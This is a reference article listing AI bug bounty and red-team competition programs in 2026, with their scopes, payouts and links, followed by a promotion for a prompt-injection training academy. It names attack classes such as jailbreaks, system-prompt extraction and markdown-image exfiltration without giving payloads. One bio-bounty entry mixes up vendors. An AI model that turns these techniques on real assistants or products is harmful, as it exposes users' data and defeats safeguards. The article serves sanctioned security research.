Reference

AI Bug Bounty Programs in 2026: Active List with Payouts

8 min read·By Anthony D'Onofrio·Updated 2026-05-15

Every active AI bug bounty program in 2026: OpenAI ($100K max), Anthropic, Google, Microsoft, xAI/Grok, Cohere, Mozilla 0din, Gray Swan Arena. Verified scopes, payout ranges, and application links.

The AI security skill stack is now monetizable in ways it wasn't 18 months ago. Multiple major labs and platforms run dedicated AI bug bounty programs in 2026, with payouts ranging from $200 for entry-level findings to $100,000 for exceptional discoveries. The programs collectively paid out tens of millions of dollars in 2025, and 2026 budgets are larger.

This page is a living reference. Each program below is verified active as of the date in the frontmatter. If you spot an outdated entry, email anthony@harbinger.partners and I'll fix it.

How AI bounty programs differ from traditional infosec bounties

Three things are worth understanding before you submit anywhere:

Different vulnerability classes. AI programs reward findings around jailbreaks, prompt injection, agentic-system risks, model-extraction, training-data exfiltration, alignment failures, and content-policy bypasses. Most don't pay for traditional infrastructure bugs (those go through the company's regular VDP or web bounty).
Some programs are open; some are application-only. Mozilla's 0din, OpenAI's Bugcrowd-hosted programs, and Anthropic's HackerOne program accept open submissions. xAI accepts reports via email. Read the entry policy before investing time on a finding.
Scope exclusions matter. Several programs explicitly exclude what most people think of as "AI hacking." Google's AI VRP excludes prompt injection and jailbreaks. Reading scope first saves wasted submissions.

Dedicated LLM-specific programs

0din (Mozilla)

Mozilla's 0day Investigative Network is the most explicitly LLM-focused bounty program in operation. Launched in mid-2024, it incentivizes findings across security boundaries that fall outside other bounty programs.

Scope. Prompt injection, guardrail jailbreaks, training data leakage, denial of service, OWASP LLM Top 10 categories.
Payouts. $500 to $15,000, discretionary, evaluated by the 0DIN team based on impact, report quality, and timing.
Process. Submit a high-level abstract first; 0din responds within three business days with a scope decision and likely payout range. Full PoC submission follows.
Where to apply. 0din.ai

If you're new to AI bounty work, this is the lowest-friction starting point. The scope is broad, the process is open, and the LLM-specific framing means your skill stack maps directly to what the program rewards.

OpenAI Safety Bug Bounty

OpenAI launched its dedicated Safety Bug Bounty Program in March 2026 with a $1 million annual pool. Run via Bugcrowd. Distinct from OpenAI's longer-running Security Bug Bounty.

Scope. AI-specific scenarios, agentic risks (including MCP), exposure of OpenAI proprietary information, account and platform integrity. Out of scope: general content-policy bypasses without demonstrable safety or abuse impact ("jailbreaks that result in rude language"), and prompts that surface easily-findable public information.
Payouts. Up to $20,000 standard. Maximum payout raised to $100,000 for exceptional and differentiated critical findings.
Where to apply. bugcrowd.com/openai

OpenAI Security Bug Bounty (separate program)

The traditional infrastructure-style program. Same Bugcrowd page, different scope.

Scope. Traditional vulnerabilities in OpenAI's infrastructure and APIs.
Payouts. $200 to $20,000, with up to $100,000 for exceptional findings.

OpenAI GPT-5.5 Bio Bounty (specialized)

A focused program for one specific objective: a single universal jailbreaking prompt that successfully answers all five bio safety questions from a clean Claude session without prompting moderation. Worth a separate listing because the scope and reward structure is unusual.

Where to apply. openai.smapply.org

Anthropic Bug Bounty Program

Anthropic's program went public on HackerOne in May 2026. Previously application-only with NDA; now accepts open submissions across two tracks.

Scope (Model Safety track). Novel, universal jailbreak attacks against Claude's Constitutional Classifiers, focused on critical high-risk domains (chemical, biological, radiological, nuclear, cybersecurity). A "universal jailbreak" is one that consistently bypasses safety measures across many topics.
Scope (Product Security track). Security vulnerabilities in Anthropic products including Claude.ai, the Claude API, and Claude Code. Claude Code scope covers critical issues: unauthorized command execution, invisible tool usage, permission bypasses, and sandbox escapes.
Payouts. Up to $15,000 per finding for both tracks.
Where to apply. hackerone.com/anthropic

Anthropic Vulnerability Disclosure Program (VDP)

Separate from the Safety Bug Bounty. Covers traditional infrastructure issues (CSRF, privilege escalation, SQL injection, XSS, directory traversal). Recognition-only, no monetary reward.

Where to submit. hackerone.com/anthropic-vdp

Google AI Vulnerability Reward Program (AI VRP)

Google runs a dedicated AI VRP that reads as a complement to its broader VRP, not a replacement. Important scope caveat below.

Scope. Flagship products: Google Search, Gemini Apps (Web, Android, iOS), Google Workspace core (Gmail, Drive, Meet, Calendar, Docs, Sheets, Slides, Forms). Standard coverage extends to AI Studio, Jules, and non-core Workspace.
Payouts. Up to $20,000 base; bonuses for report quality and novelty raise the cap to $30,000. Sensitive data exfiltration: up to $15,000. Phishing enablement and model theft: up to $5,000.
Out of scope. Prompt injection, jailbreaks, and alignment issues are explicitly excluded. This is the single most important rule to understand: a high-quality jailbreak finding earns nothing here. Reserve those submissions for 0din, OpenAI Safety, or Anthropic.
Where to apply. bughunters.google.com

Microsoft Copilot Bug Bounty

Microsoft's Copilot Bounty covers AI experiences in their consumer Copilot product line. Updated April 2026 to integrate moderate-severity submissions.

Scope. Copilot consumer products: copilot.microsoft.com, copilot.ai, Copilot for Telegram, Copilot for WhatsApp, Microsoft Copilot Application (iOS / Android), Copilot in Microsoft Edge (Windows), Bing generative search in Browser.
Payouts. $250 to $30,000. Critical flaws allowing inference manipulation hit the cap. Moderate-severity findings now qualify for awards up to $5,000.
Out of scope. Training, documentation, samples, community forum sites.
Where to apply. msrc.microsoft.com/bounty-ai

xAI (Grok)

xAI runs a bug bounty program through HackerOne covering Grok and AI features across the X platform. Also accepts reports via email at vulnerabilities@x.ai.

Scope. Security vulnerabilities in Grok models, Grok integrations on X (web and mobile), and the xAI API. Includes prompt injection, unauthorized data access, and authentication/authorization flaws in AI-powered features.
Payouts. Payout tiers are not publicly documented. Reports are triaged by HackerOne with xAI's security team.
Where to submit. hackerone.com/x or email vulnerabilities@x.ai

Cohere

Cohere maintains a vulnerability disclosure program through its Trust Center. Covers the Cohere platform, Command models, and enterprise API endpoints. Annual third-party security audits supplement the program.

Scope. Security vulnerabilities in Cohere's platform and APIs. Includes model-level issues and infrastructure bugs.
Payouts. Not publicly documented. Contact via the Trust Center for details.
Where to submit. trustcenter.cohere.com

Competition-format programs

These pay differently than bounties: prize pools split among top finishers in time-bound events. Worth knowing because the audience and skill bar are similar.

Gray Swan Arena

Time-bound red-team competitions on (anonymized) frontier models, sponsored by AI labs and governments.

Format. Wave-based seasons. Multiple concurrent challenges across categories: Safeguards, Indirect Prompt Injection, Agent Red-Teaming, Machine-in-the-Middle.
Prize pools. $40,000 to $300,000+ per challenge. Past sponsors include OpenAI, Anthropic, Google DeepMind, UK AISI.
Bonus opportunity. Top 40 overall participants get invited to Gray Swan's private red-teaming network for paid engagement opportunities.
Where to compete. app.grayswan.ai/arena

HackAPrompt

Annual large-scale prompt-injection competition. Prize pools historically $40,000+. Format and exact payouts vary year to year.

Aggregator platforms

Most of the programs above are hosted on one of two platforms. Worth tracking both because new programs land here first.

HackerOne

Hosts Anthropic's bounties (now public), xAI, Google's VRP intake for some programs, and a long tail of company-specific AI programs. Search "AI" or "LLM" on the platform's program directory for the current list.

Bugcrowd

Hosts OpenAI's programs. Smaller AI footprint than HackerOne but the OpenAI relationship makes it load-bearing.

How to choose where to start

If you're new to AI bug bounty work, the order of operations that has worked for the people I've seen come up the curve fastest:

Start with 0din. Lowest friction, broadest LLM scope, open submissions. First payout teaches the report format.
Compete in HackAPrompt or Gray Swan Arena. Time-bound events force iteration speed. Top placements become resume material that gets you accepted into the application-only programs.
Submit to Anthropic and the OpenAI Safety BB once you have at least one paid 0din finding or a Gray Swan placement to cite. Anthropic's program is now open on HackerOne (no longer requires application + NDA). Track record still helps your reports get prioritized.
Microsoft Copilot, Google AI VRP, and xAI for traditional vulnerability skills applied to AI surfaces. The payouts are higher, the scopes are stricter, and the findings tend to look more like classic web/infrastructure bugs.

The single biggest mistake I see new researchers make: submitting prompt-injection findings to Google's AI VRP, which explicitly excludes them. Read the scope first, every time.

Where Wraith fits in this stack

If you're building the skill from scratch, Wraith Academy is structured around exactly the categories these programs pay for. The audit-framing primitive Mira Ulvov tests is the same primitive Anthropic's Constitutional Classifiers are designed to resist. The markdown-image exfiltration the Cartographer of Hollow Marches teaches is the exact attack class that earns 0din and Microsoft Copilot payouts. The system-prompt extraction Pyromos rewards is the foundational skill behind every chained jailbreak finding.

The WCAP credential is the cert designed for this market: it tests the exact attack categories these bounty programs pay for, in a graded format. Pass WCAP, get listed in the public credentials registry, then go submit.

If you want to start training: Academy is free. If you want to know what to attack first: Mira Ulvov, the Memory Smuggler and the Memory Poisoning pillar cover the highest-value modern category. If you want the full reference for AI security categories these programs reward, the OWASP LLM Top 10 annotated walkthrough maps each category to the relevant bounty scopes.

Last updated

Verified: 2026-05-15. Programs change scope and payout structure regularly. If you spot an outdated entry, email anthony@harbinger.partners and I'll fix it.

The State of LLM Bug Bounties in 2026 — the companion analysis: which attack classes actually pay, median payouts vs. advertised ceilings, and how to pick a program that fits your hunting style.
Prompt Injection: A Complete Guide — the foundational attack class behind most AI bounty findings.
System Prompt Extraction guide — extraction that reveals embedded secrets is one of the highest-paying categories across programs.
Data Exfiltration via Markdown Images — the quiet exfil channel that earns 0din and Microsoft Copilot payouts.

Sources:

Practice these techniques hands-on

14 free challenges teaching prompt injection, system prompt extraction, data exfiltration, and more.

Enter the Academy →